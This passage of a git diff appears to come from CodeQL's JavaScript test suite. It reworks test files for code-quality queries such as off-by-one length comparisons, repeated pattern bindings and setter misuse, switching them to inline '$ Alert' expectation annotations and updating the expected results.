+Object.setPrototypeOf(o1, Function.prototype); +Object.create(class{}); +Function.prototype.isPrototypeOf(o1); +o1.__proto__ = new Date(); -var o2 = { __proto__: undefined }; // NOT OK -Object.setPrototypeOf(o2, 42); // NOT OK -Object.create(true); // NOT OK -"function".isPrototypeOf(o2); // NOT OK +var o2 = { __proto__: undefined }; // $ Alert +Object.setPrototypeOf(o2, 42); // $ Alert +Object.create(true); // $ Alert +"function".isPrototypeOf(o2); // $ Alert diff --git a/javascript/ql/test/query-tests/LanguageFeatures/JumpFromFinally/JumpFromFinally.qlref b/javascript/ql/test/query-tests/LanguageFeatures/JumpFromFinally/JumpFromFinally.qlref index f76a131eff46..6404cd83590e 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/JumpFromFinally/JumpFromFinally.qlref +++ b/javascript/ql/test/query-tests/LanguageFeatures/JumpFromFinally/JumpFromFinally.qlref @@ -1 +1,2 @@ -LanguageFeatures/JumpFromFinally.ql \ No newline at end of file +query: LanguageFeatures/JumpFromFinally.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/LanguageFeatures/JumpFromFinally/tst.js b/javascript/ql/test/query-tests/LanguageFeatures/JumpFromFinally/tst.js index 0cf40521ad93..d875f1c1d03e 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/JumpFromFinally/tst.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/JumpFromFinally/tst.js @@ -4,7 +4,7 @@ function foo(resource) { throw new Error(); } finally { resource.close(); - return true; + return true; // $ Alert } } @@ -25,7 +25,7 @@ function baz(resource) { throw new Error(); } finally { resource.close(); - break; + break; // $ Alert } } } diff --git a/javascript/ql/test/query-tests/LanguageFeatures/LengthComparisonOffByOne/LengthComparisonOffByOne.expected b/javascript/ql/test/query-tests/LanguageFeatures/LengthComparisonOffByOne/LengthComparisonOffByOne.expected index 2af10be24c0d..c9b2667e9e74 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/LengthComparisonOffByOne/LengthComparisonOffByOne.expected +++ b/javascript/ql/test/query-tests/LanguageFeatures/LengthComparisonOffByOne/LengthComparisonOffByOne.expected @@ -1,7 +1,7 @@ -| tst.js:2:17:2:32 | i <= args.length | Off-by-one index comparison against length may lead to out-of-bounds $@. | tst.js:3:15:3:21 | args[i] | read | -| tst.js:7:17:7:32 | args.length >= i | Off-by-one index comparison against length may lead to out-of-bounds $@. | tst.js:8:15:8:21 | args[i] | read | -| tst.js:18:5:18:20 | j <= args.length | Off-by-one index comparison against length may lead to out-of-bounds $@. | tst.js:19:15:19:21 | args[j] | read | -| tst.js:23:5:23:20 | args.length >= j | Off-by-one index comparison against length may lead to out-of-bounds $@. | tst.js:24:15:24:21 | args[j] | read | -| tst.js:34:19:34:31 | i <= a.length | Off-by-one index comparison against length may lead to out-of-bounds $@. | tst.js:35:9:35:12 | a[i] | read | -| tst.js:51:9:51:21 | i <= a.length | Off-by-one index comparison against length may lead to out-of-bounds $@. | tst.js:51:43:51:46 | a[i] | read | -| tst.js:51:26:51:38 | i <= b.length | Off-by-one index comparison against length may lead to out-of-bounds $@. | tst.js:51:52:51:55 | b[i] | read | +| tst.js:1:17:1:32 | i <= args.length | Off-by-one index comparison against length may lead to out-of-bounds $@. | tst.js:2:15:2:21 | args[i] | read | +| tst.js:5:17:5:32 | args.length >= i | Off-by-one index comparison against length may lead to out-of-bounds $@. | tst.js:6:15:6:21 | args[i] | read | +| tst.js:15:5:15:20 | j <= args.length | Off-by-one index comparison against length may lead to out-of-bounds $@. | tst.js:16:15:16:21 | args[j] | read | +| tst.js:19:5:19:20 | args.length >= j | Off-by-one index comparison against length may lead to out-of-bounds $@. | tst.js:20:15:20:21 | args[j] | read | +| tst.js:29:19:29:31 | i <= a.length | Off-by-one index comparison against length may lead to out-of-bounds $@. | tst.js:30:9:30:12 | a[i] | read | +| tst.js:46:9:46:21 | i <= a.length | Off-by-one index comparison against length may lead to out-of-bounds $@. | tst.js:46:43:46:46 | a[i] | read | +| tst.js:46:26:46:38 | i <= b.length | Off-by-one index comparison against length may lead to out-of-bounds $@. | tst.js:46:52:46:55 | b[i] | read | diff --git a/javascript/ql/test/query-tests/LanguageFeatures/LengthComparisonOffByOne/LengthComparisonOffByOne.qlref b/javascript/ql/test/query-tests/LanguageFeatures/LengthComparisonOffByOne/LengthComparisonOffByOne.qlref index 4b12bd2f70ba..2514b6d76698 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/LengthComparisonOffByOne/LengthComparisonOffByOne.qlref +++ b/javascript/ql/test/query-tests/LanguageFeatures/LengthComparisonOffByOne/LengthComparisonOffByOne.qlref @@ -1 +1,2 @@ -LanguageFeatures/LengthComparisonOffByOne.ql \ No newline at end of file +query: LanguageFeatures/LengthComparisonOffByOne.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/LanguageFeatures/LengthComparisonOffByOne/tst.js b/javascript/ql/test/query-tests/LanguageFeatures/LengthComparisonOffByOne/tst.js index c819b10ad56a..6b214c9b0423 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/LengthComparisonOffByOne/tst.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/LengthComparisonOffByOne/tst.js @@ -1,43 +1,38 @@ -// BAD: Loop upper bound is off-by-one -for (var i = 0; i <= args.length; i++) { +for (var i = 0; i <= args.length; i++) { // $ Alert - Loop upper bound is off-by-one console.log(args[i]); } -// BAD: Loop upper bound is off-by-one -for (var i = 0; args.length >= i; i++) { +for (var i = 0; args.length >= i; i++) { // $ Alert - Loop upper bound is off-by-one console.log(args[i]); } -// GOOD: Loop upper bound is correct +// OK - Loop upper bound is correct for (var i = 0; i < args.length; i++) { console.log(args[i]); } var j = 0; -// BAD: Off-by-one on index validity check -if (j <= args.length) { +if (j <= args.length) { // $ Alert - Off-by-one on index validity check console.log(args[j]); } -// BAD: Off-by-one on index validity check -if (args.length >= j) { +if (args.length >= j) { // $ Alert - Off-by-one on index validity check console.log(args[j]); } -// GOOD: Correct terminating value +// OK - Correct terminating value if (args.length > j) { console.log(args[j]); } -// BAD: incorrect upper bound -function badContains(a, elt) { - for (let i = 0; i <= a.length; ++i) +function badContains(a, elt) { // incorrect upper bound + for (let i = 0; i <= a.length; ++i) // $ Alert if (a[i] === elt) return true; return false; } -// GOOD: correct upper bound +// OK - correct upper bound function goodContains(a, elt) { for (let i = 0; i < a.length; ++i) if (a[i] === elt) @@ -48,12 +43,12 @@ function goodContains(a, elt) { // this is arguably OK, but we flag it function same(a, b) { for (var i=0; i < a.length || i < b.length ; ++i) - if (i <= a.length && i <= b.length && a[i] !== b[i]) + if (i <= a.length && i <= b.length && a[i] !== b[i]) // $ Alert return false; return true; } -// GOOD: incorrect upper bound, but extra check +// OK - incorrect upper bound, but extra check function badContains(a, elt) { for (let i = 0; i <= a.length; ++i) if (i !== a.length && a[i] === elt) diff --git a/javascript/ql/test/query-tests/LanguageFeatures/NonLinearPattern/NonLinearPattern.expected b/javascript/ql/test/query-tests/LanguageFeatures/NonLinearPattern/NonLinearPattern.expected index 2f61724a5661..31d9fc228113 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/NonLinearPattern/NonLinearPattern.expected +++ b/javascript/ql/test/query-tests/LanguageFeatures/NonLinearPattern/NonLinearPattern.expected @@ -1,11 +1,11 @@ | NonLinearPatternTS.ts:1:34:1:39 | number | The pattern variable 'number' appears to be a type, but is a variable $@. | NonLinearPatternTS.ts:1:23:1:28 | number | previously bound | -| ts-test.ts:3:13:3:13 | x | Repeated binding of pattern variable 'x' $@. | ts-test.ts:3:10:3:10 | x | previously bound | -| ts-test.ts:8:16:8:16 | x | Repeated binding of pattern variable 'x' $@. | ts-test.ts:8:10:8:10 | x | previously bound | -| ts-test.ts:11:10:11:10 | x | Repeated binding of pattern variable 'x' $@. | ts-test.ts:11:7:11:7 | x | previously bound | -| ts-test.ts:21:8:21:13 | string | The pattern variable 'string' appears to be a type, but is a variable $@. | ts-test.ts:20:8:20:13 | string | previously bound | -| ts-test.ts:32:16:32:16 | x | Repeated binding of pattern variable 'x' $@. | ts-test.ts:30:12:30:12 | x | previously bound | -| ts-test.ts:34:20:34:20 | x | Repeated binding of pattern variable 'x' $@. | ts-test.ts:30:12:30:12 | x | previously bound | -| ts-test.ts:40:27:40:32 | string | Repeated binding of pattern variable 'string' $@. | ts-test.ts:40:16:40:21 | string | previously bound | -| tst.js:3:13:3:13 | x | Repeated binding of pattern variable 'x' $@. | tst.js:3:10:3:10 | x | previously bound | -| tst.js:8:16:8:16 | x | Repeated binding of pattern variable 'x' $@. | tst.js:8:10:8:10 | x | previously bound | -| tst.js:11:10:11:10 | x | Repeated binding of pattern variable 'x' $@. | tst.js:11:7:11:7 | x | previously bound | +| ts-test.ts:2:13:2:13 | x | Repeated binding of pattern variable 'x' $@. | ts-test.ts:2:10:2:10 | x | previously bound | +| ts-test.ts:6:16:6:16 | x | Repeated binding of pattern variable 'x' $@. | ts-test.ts:6:10:6:10 | x | previously bound | +| ts-test.ts:8:10:8:10 | x | Repeated binding of pattern variable 'x' $@. | ts-test.ts:8:7:8:7 | x | previously bound | +| ts-test.ts:18:8:18:13 | string | The pattern variable 'string' appears to be a type, but is a variable $@. | ts-test.ts:17:8:17:13 | string | previously bound | +| ts-test.ts:29:16:29:16 | x | Repeated binding of pattern variable 'x' $@. | ts-test.ts:27:12:27:12 | x | previously bound | +| ts-test.ts:31:20:31:20 | x | Repeated binding of pattern variable 'x' $@. | ts-test.ts:27:12:27:12 | x | previously bound | +| ts-test.ts:37:27:37:32 | string | Repeated binding of pattern variable 'string' $@. | ts-test.ts:37:16:37:21 | string | previously bound | +| tst.js:2:13:2:13 | x | Repeated binding of pattern variable 'x' $@. | tst.js:2:10:2:10 | x | previously bound | +| tst.js:6:16:6:16 | x | Repeated binding of pattern variable 'x' $@. | tst.js:6:10:6:10 | x | previously bound | +| tst.js:8:10:8:10 | x | Repeated binding of pattern variable 'x' $@. | tst.js:8:7:8:7 | x | previously bound | diff --git a/javascript/ql/test/query-tests/LanguageFeatures/NonLinearPattern/NonLinearPattern.qlref b/javascript/ql/test/query-tests/LanguageFeatures/NonLinearPattern/NonLinearPattern.qlref index 322a10d00085..5684a790f6cc 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/NonLinearPattern/NonLinearPattern.qlref +++ b/javascript/ql/test/query-tests/LanguageFeatures/NonLinearPattern/NonLinearPattern.qlref @@ -1 +1,2 @@ -LanguageFeatures/NonLinearPattern.ql \ No newline at end of file +query: LanguageFeatures/NonLinearPattern.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/LanguageFeatures/NonLinearPattern/NonLinearPatternTS.ts b/javascript/ql/test/query-tests/LanguageFeatures/NonLinearPattern/NonLinearPatternTS.ts index d19e8bb327fc..2ff108ddb8a1 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/NonLinearPattern/NonLinearPatternTS.ts +++ b/javascript/ql/test/query-tests/LanguageFeatures/NonLinearPattern/NonLinearPatternTS.ts @@ -1,3 +1,3 @@ -function distance({x: number, y: number}) { +function distance({x: number, y: number}) { // $ Alert return Math.sqrt(x*x + y*y); } diff --git a/javascript/ql/test/query-tests/LanguageFeatures/NonLinearPattern/ts-test.ts b/javascript/ql/test/query-tests/LanguageFeatures/NonLinearPattern/ts-test.ts index 1198d2c5ff74..120fa7098ee5 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/NonLinearPattern/ts-test.ts +++ b/javascript/ql/test/query-tests/LanguageFeatures/NonLinearPattern/ts-test.ts @@ -1,41 +1,38 @@ function distanceFromOrigin(point) { - // NOT OK - var [x, x] = point; + var [x, x] = point; // $ Alert return Math.sqrt(x*x + y*y); } -// NOT OK -var { x: x, y: x } = o; +var { x: x, y: x } = o; // $ Alert + +var { x, x } = o; // $ Alert -// NOT OK -var { x, x } = o; -// OK var { x: x, x: y } = o; -// OK + var { p = x, q = x } = o; function f({ x: string, - y: string // NOT OK + y: string // $ Alert }) { } -function g({x, y}: {x: string, y: string}) { // OK +function g({x, y}: {x: string, y: string}) { } function blah(arg) { var { x: x, y: { - x: x, // NOT OK + x: x, // $ Alert y: { - x: x // NOT OK + x: x // $ Alert } } } = arg; } -function h({x: string, y: string}: any) { // NOT OK +function h({x: string, y: string}: any) { // $ Alert } diff --git a/javascript/ql/test/query-tests/LanguageFeatures/NonLinearPattern/tst.js b/javascript/ql/test/query-tests/LanguageFeatures/NonLinearPattern/tst.js index 0e6b79f4675f..017499000358 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/NonLinearPattern/tst.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/NonLinearPattern/tst.js @@ -1,17 +1,14 @@ function distanceFromOrigin(point) { - // NOT OK - var [x, x] = point; + var [x, x] = point; // $ Alert return Math.sqrt(x*x + y*y); } -// NOT OK -var { x: x, y: x } = o; +var { x: x, y: x } = o; // $ Alert + +var { x, x } = o; // $ Alert -// NOT OK -var { x, x } = o; -// OK var { x: x, x: y } = o; -// OK + var { p = x, q = x } = o; diff --git a/javascript/ql/test/query-tests/LanguageFeatures/PropertyWriteOnPrimitive/PropertyWriteOnPrimitive.expected b/javascript/ql/test/query-tests/LanguageFeatures/PropertyWriteOnPrimitive/PropertyWriteOnPrimitive.expected index 9dcd49a99d3f..75d8c23b51f6 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/PropertyWriteOnPrimitive/PropertyWriteOnPrimitive.expected +++ b/javascript/ql/test/query-tests/LanguageFeatures/PropertyWriteOnPrimitive/PropertyWriteOnPrimitive.expected @@ -1,3 +1,3 @@ -| tst.js:2:1:2:3 | (0) | Assignment to property foo of a primitive value with type number. | -| tst.js:11:5:11:5 | s | Assignment to a property of a primitive value with type string. | -| tst.js:17:3:17:3 | x | Assignment to property y of a primitive value with type number or string. | +| tst.js:1:1:1:3 | (0) | Assignment to property foo of a primitive value with type number. | +| tst.js:8:5:8:5 | s | Assignment to a property of a primitive value with type string. | +| tst.js:13:3:13:3 | x | Assignment to property y of a primitive value with type number or string. | diff --git a/javascript/ql/test/query-tests/LanguageFeatures/PropertyWriteOnPrimitive/PropertyWriteOnPrimitive.qlref b/javascript/ql/test/query-tests/LanguageFeatures/PropertyWriteOnPrimitive/PropertyWriteOnPrimitive.qlref index f57cf67c800c..6dccd34408b6 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/PropertyWriteOnPrimitive/PropertyWriteOnPrimitive.qlref +++ b/javascript/ql/test/query-tests/LanguageFeatures/PropertyWriteOnPrimitive/PropertyWriteOnPrimitive.qlref @@ -1 +1,2 @@ -LanguageFeatures/PropertyWriteOnPrimitive.ql \ No newline at end of file +query: LanguageFeatures/PropertyWriteOnPrimitive.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/LanguageFeatures/PropertyWriteOnPrimitive/tst.js b/javascript/ql/test/query-tests/LanguageFeatures/PropertyWriteOnPrimitive/tst.js index 5d83bad877dc..a74ffbc860a2 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/PropertyWriteOnPrimitive/tst.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/PropertyWriteOnPrimitive/tst.js @@ -1,24 +1,20 @@ -// NOT OK -(0).foo = 42; +(0).foo = 42; // $ Alert -// NOT OK, but already flagged by SuspiciousPropAccess.ql -null.bar = 23; undefined.baz = 42; +null.bar = 23; undefined.baz = 42; // OK - already flagged by SuspiciousPropAccess.ql function f() { var s = ""; for (var i=0;i<10;++i) - // NOT OK - s[i] = " "; + s[i] = " "; // $ Alert } function g(b) { var x = b ? "" : 42, z; - // NOT OK - x.y = true; - // OK: we don't know the type of `b` + x.y = true; // $ Alert + // OK - we don't know the type of `b` b.y = true; return; - // OK: no types inferred for `z`, since this is dead code + // OK - no types inferred for `z`, since this is dead code z.y = true; } @@ -26,4 +22,4 @@ function h() { let tmp; let obj = (tmp ||= {}); obj.p = 42; -} \ No newline at end of file +} diff --git a/javascript/ql/test/query-tests/LanguageFeatures/SemicolonInsertion/SemicolonInsertion.qlref b/javascript/ql/test/query-tests/LanguageFeatures/SemicolonInsertion/SemicolonInsertion.qlref index 2419fbd90b9b..b84aceb435ad 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/SemicolonInsertion/SemicolonInsertion.qlref +++ b/javascript/ql/test/query-tests/LanguageFeatures/SemicolonInsertion/SemicolonInsertion.qlref @@ -1 +1,2 @@ -LanguageFeatures/SemicolonInsertion.ql +query: LanguageFeatures/SemicolonInsertion.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/LanguageFeatures/SemicolonInsertion/export.js b/javascript/ql/test/query-tests/LanguageFeatures/SemicolonInsertion/export.js index 7e06517fe174..4c95a6eb67dc 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/SemicolonInsertion/export.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/SemicolonInsertion/export.js @@ -2,7 +2,7 @@ export default function f() { return 23; } -export var x = 42 +export var x = 42 // $ Alert //pad with enough explicit semicolons to satisfy 90% threshold foo(); diff --git a/javascript/ql/test/query-tests/LanguageFeatures/SemicolonInsertion/jscript.js b/javascript/ql/test/query-tests/LanguageFeatures/SemicolonInsertion/jscript.js index 5e9b07cf6757..6f125751c3a2 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/SemicolonInsertion/jscript.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/SemicolonInsertion/jscript.js @@ -1,6 +1,6 @@ function window::onload() {} -window.onload = function onload() {} +window.onload = function onload() {} // $ Alert // pad with enough explicit semicolons to satisfy 90% threshold foo(); diff --git a/javascript/ql/test/query-tests/LanguageFeatures/SemicolonInsertion/tst.js b/javascript/ql/test/query-tests/LanguageFeatures/SemicolonInsertion/tst.js index 9b1d6f668923..3c296665f301 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/SemicolonInsertion/tst.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/SemicolonInsertion/tst.js @@ -1,22 +1,22 @@ function tst() { - var a = { // NOT OK + var a = { 'i': 1, 'j': 2 - } + } // $ Alert - return 1 // NOT OK + return 1 // $ Alert - if (condition) { // OK + if (condition) { } - for (i = 0; i < 10; i++) { // OK + for (i = 0; i < 10; i++) { } - label: while (condition) { // OK - break label; // OK + label: while (condition) { + break label; } - return 1; // OK + return 1; //pad with enough explicit semicolons to satisfy 90% threshold foo(); diff --git a/javascript/ql/test/query-tests/LanguageFeatures/SetterIgnoresParameter/SetterIgnoresParameter.expected b/javascript/ql/test/query-tests/LanguageFeatures/SetterIgnoresParameter/SetterIgnoresParameter.expected index bf01936dd730..e49869816edf 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/SetterIgnoresParameter/SetterIgnoresParameter.expected +++ b/javascript/ql/test/query-tests/LanguageFeatures/SetterIgnoresParameter/SetterIgnoresParameter.expected @@ -1,2 +1,2 @@ -| tst.js:15:3:15:12 | set x(v ... OK\\n\\t\\t} | This setter function does not use its parameter $@. | tst.js:15:9:15:9 | v | v | -| tst.js:40:3:40:25 | set y(_ ... _x\|0; } | This setter function does not use its parameter $@. | tst.js:40:9:40:10 | _y | _y | +| tst.js:15:3:15:23 | set x(v ... ert\\n\\t\\t} | This setter function does not use its parameter $@. | tst.js:15:9:15:9 | v | v | +| tst.js:38:3:38:25 | set y(_ ... _x\|0; } | This setter function does not use its parameter $@. | tst.js:38:9:38:10 | _y | _y | diff --git a/javascript/ql/test/query-tests/LanguageFeatures/SetterIgnoresParameter/SetterIgnoresParameter.qlref b/javascript/ql/test/query-tests/LanguageFeatures/SetterIgnoresParameter/SetterIgnoresParameter.qlref index c5e101163a52..f090c96c40ce 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/SetterIgnoresParameter/SetterIgnoresParameter.qlref +++ b/javascript/ql/test/query-tests/LanguageFeatures/SetterIgnoresParameter/SetterIgnoresParameter.qlref @@ -1 +1,2 @@ -LanguageFeatures/SetterIgnoresParameter.ql \ No newline at end of file +query: LanguageFeatures/SetterIgnoresParameter.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/LanguageFeatures/SetterIgnoresParameter/tst.js b/javascript/ql/test/query-tests/LanguageFeatures/SetterIgnoresParameter/tst.js index 22439c1e4f91..58682204ca5f 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/SetterIgnoresParameter/tst.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/SetterIgnoresParameter/tst.js @@ -5,27 +5,26 @@ function A() { return _a; }, set a(v) { - // OK + _a = v|0 }, get x() { return _x; }, - set x(v) { - // NOT OK + set x(v) { // $ Alert }, get y() { return 56; }, set y(v) { - // OK + throw new Error("Cannot mutate y."); }, set z(v) { - // OK + _z = arguments[0] | 0; } }; @@ -36,7 +35,6 @@ function Point(x, y) { get x() { return x; }, set x(_x) { x = _x|0; }, get y() { return y; }, - // NOT OK - set y(_y) { x = _x|0; } + set y(_y) { x = _x|0; } // $ Alert }; } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/LanguageFeatures/SetterReturn/SetterReturn.expected b/javascript/ql/test/query-tests/LanguageFeatures/SetterReturn/SetterReturn.expected index a5e92e24b4bd..2b911b330b6c 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/SetterReturn/SetterReturn.expected +++ b/javascript/ql/test/query-tests/LanguageFeatures/SetterReturn/SetterReturn.expected @@ -1 +1 @@ -| tst.js:15:3:15:16 | return "nope"; | Useless return statement in setter function. | +| tst.js:14:3:14:16 | return "nope"; | Useless return statement in setter function. | diff --git a/javascript/ql/test/query-tests/LanguageFeatures/SetterReturn/SetterReturn.qlref b/javascript/ql/test/query-tests/LanguageFeatures/SetterReturn/SetterReturn.qlref index 93a02072150c..0c6e38131cc4 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/SetterReturn/SetterReturn.qlref +++ b/javascript/ql/test/query-tests/LanguageFeatures/SetterReturn/SetterReturn.qlref @@ -1 +1,2 @@ -LanguageFeatures/SetterReturn.ql \ No newline at end of file +query: LanguageFeatures/SetterReturn.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/LanguageFeatures/SetterReturn/tst.js b/javascript/ql/test/query-tests/LanguageFeatures/SetterReturn/tst.js index 4211400e6c48..5c7ea043cbe2 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/SetterReturn/tst.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/SetterReturn/tst.js @@ -1,17 +1,16 @@ var o = { _secret_x: 42, get x() { - // OK + return 42; }, set x(v) { if (v !== 42) - // OK + return; _secret_x = v; }, set y(w) { - // NOT OK - return "nope"; + return "nope"; // $ Alert } } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/SpuriousArguments.expected b/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/SpuriousArguments.expected index 92b3fc978773..b88dd7d68e80 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/SpuriousArguments.expected +++ b/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/SpuriousArguments.expected @@ -8,17 +8,17 @@ | reflection.js:7:15:7:18 | 1 | Superfluous arguments passed to $@. | reflection.js:1:1:1:23 | functio ... eturn;} | function f0 | | reflection.js:12:18:12:18 | 2 | Superfluous argument passed to $@. | reflection.js:2:1:2:24 | functio ... eturn;} | function f1 | | thisparameter.ts:4:11:4:12 | 45 | Superfluous argument passed to $@. | thisparameter.ts:1:1:1:45 | functio ... eturn;} | function foo | -| tst.js:11:3:11:5 | g() | Superfluous argument passed to $@. | tst.js:1:1:4:1 | functio ... x+19;\\n} | function f | -| tst.js:33:15:33:18 | 2 | Superfluous arguments passed to $@. | externs.js:34:1:34:27 | functio ... str) {} | function String | -| tst.js:37:4:37:5 | 42 | Superfluous argument passed to $@. | tst.js:38:4:38:23 | function() {return;} | anonymous function | -| tst.js:46:19:46:20 | 10 | Superfluous argument passed to $@. | externs.js:36:1:36:27 | functio ... num) {} | function parseFloat | -| tst.js:70:11:70:12 | 42 | Superfluous argument passed to $@. | tst.js:49:2:51:2 | functio ... urn;\\n\\t} | function nonEmpty | -| tst.js:75:13:75:14 | 42 | Superfluous argument passed to $@. | tst.js:63:19:63:33 | () => undefined | function emptyArrow | -| tst.js:76:31:76:32 | 42 | Superfluous argument passed to $@. | tst.js:64:33:64:32 | () {} | default constructor of class ImplicitEmptyConstructor | -| tst.js:77:31:77:32 | 42 | Superfluous argument passed to $@. | tst.js:67:14:68:3 | (){\\n\\t\\t} | constructor of class ExplicitEmptyConstructor | -| tst.js:78:20:78:21 | 10 | Superfluous argument passed to $@. | externs.js:36:1:36:27 | functio ... num) {} | function parseFloat | -| tst.js:114:20:114:21 | 42 | Superfluous argument passed to $@. | tst.js:82:2:86:2 | functio ... \\n\\t\\t}\\n\\t} | function notAPlainThrower1 | -| tst.js:115:20:115:21 | 42 | Superfluous argument passed to $@. | tst.js:87:2:90:2 | functio ... .");\\n\\t} | function notAPlainThrower2 | -| tst.js:116:20:116:21 | 42 | Superfluous argument passed to $@. | tst.js:91:2:94:2 | functio ... .");\\n\\t} | function notAPlainThrower3 | -| tst.js:120:23:120:24 | 87 | Superfluous argument passed to $@. | tst.js:102:2:104:2 | functio ... (p);\\n\\t} | function throwerWithParam | -| tst.js:121:18:121:19 | 42 | Superfluous argument passed to $@. | tst.js:105:2:113:2 | functio ... )();\\n\\t} | function throwerIndirect | +| tst.js:10:3:10:5 | g() | Superfluous argument passed to $@. | tst.js:1:1:4:1 | functio ... x+19;\\n} | function f | +| tst.js:31:15:31:18 | 2 | Superfluous arguments passed to $@. | externs.js:34:1:34:27 | functio ... str) {} | function String | +| tst.js:34:4:34:5 | 42 | Superfluous argument passed to $@. | tst.js:35:4:35:23 | function() {return;} | anonymous function | +| tst.js:43:19:43:20 | 10 | Superfluous argument passed to $@. | externs.js:36:1:36:27 | functio ... num) {} | function parseFloat | +| tst.js:67:11:67:12 | 42 | Superfluous argument passed to $@. | tst.js:46:2:48:2 | functio ... urn;\\n\\t} | function nonEmpty | +| tst.js:72:13:72:14 | 42 | Superfluous argument passed to $@. | tst.js:60:19:60:33 | () => undefined | function emptyArrow | +| tst.js:73:31:73:32 | 42 | Superfluous argument passed to $@. | tst.js:61:33:61:32 | () {} | default constructor of class ImplicitEmptyConstructor | +| tst.js:74:31:74:32 | 42 | Superfluous argument passed to $@. | tst.js:64:14:65:3 | (){\\n\\t\\t} | constructor of class ExplicitEmptyConstructor | +| tst.js:75:20:75:21 | 10 | Superfluous argument passed to $@. | externs.js:36:1:36:27 | functio ... num) {} | function parseFloat | +| tst.js:111:20:111:21 | 42 | Superfluous argument passed to $@. | tst.js:79:2:83:2 | functio ... \\n\\t\\t}\\n\\t} | function notAPlainThrower1 | +| tst.js:112:20:112:21 | 42 | Superfluous argument passed to $@. | tst.js:84:2:87:2 | functio ... .");\\n\\t} | function notAPlainThrower2 | +| tst.js:113:20:113:21 | 42 | Superfluous argument passed to $@. | tst.js:88:2:91:2 | functio ... .");\\n\\t} | function notAPlainThrower3 | +| tst.js:117:23:117:24 | 87 | Superfluous argument passed to $@. | tst.js:99:2:101:2 | functio ... (p);\\n\\t} | function throwerWithParam | +| tst.js:118:18:118:19 | 42 | Superfluous argument passed to $@. | tst.js:102:2:110:2 | functio ... )();\\n\\t} | function throwerIndirect | diff --git a/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/SpuriousArguments.qlref b/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/SpuriousArguments.qlref index f148cdba2ece..2c48d9faefb0 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/SpuriousArguments.qlref +++ b/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/SpuriousArguments.qlref @@ -1 +1,2 @@ -LanguageFeatures/SpuriousArguments.ql \ No newline at end of file +query: LanguageFeatures/SpuriousArguments.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/es2015.js b/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/es2015.js index 928edcd7fd3e..07f4446800b0 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/es2015.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/es2015.js @@ -1,7 +1,7 @@ class Class1 { constructor(x) { this.x = x; } } -new Class1(42, 23); // NOT OK: `23` is ignored +new Class1(42, 23); // $ Alert - `23` is ignored class Sup { constructor(x) { this.x = x; } @@ -10,12 +10,12 @@ class Sup { class Sub extends Sup { } -new Sub(42); // OK: synthetic constructor delegates to super constructor +new Sub(42); // OK - synthetic constructor delegates to super constructor class Other {} -new Other(42); // NOT OK: `42` is ignored +new Other(42); // $ Alert - `42` is ignored var args = []; -f(...args); // OK -f(42, ...args); // NOT OK \ No newline at end of file +f(...args); +f(42, ...args); // $ Alert \ No newline at end of file diff --git a/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/globals.js b/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/globals.js index 3771a18ed876..e41ddd2d0136 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/globals.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/globals.js @@ -4,7 +4,7 @@ function global() {return;} window.global = function (x) {return;}; })(this); -global(x); // OK: might refer to function on line 4 +global(x); // OK - might refer to function on line 4 function otherglobal() {return;} @@ -12,6 +12,6 @@ var o = { otherglobal: function (x) 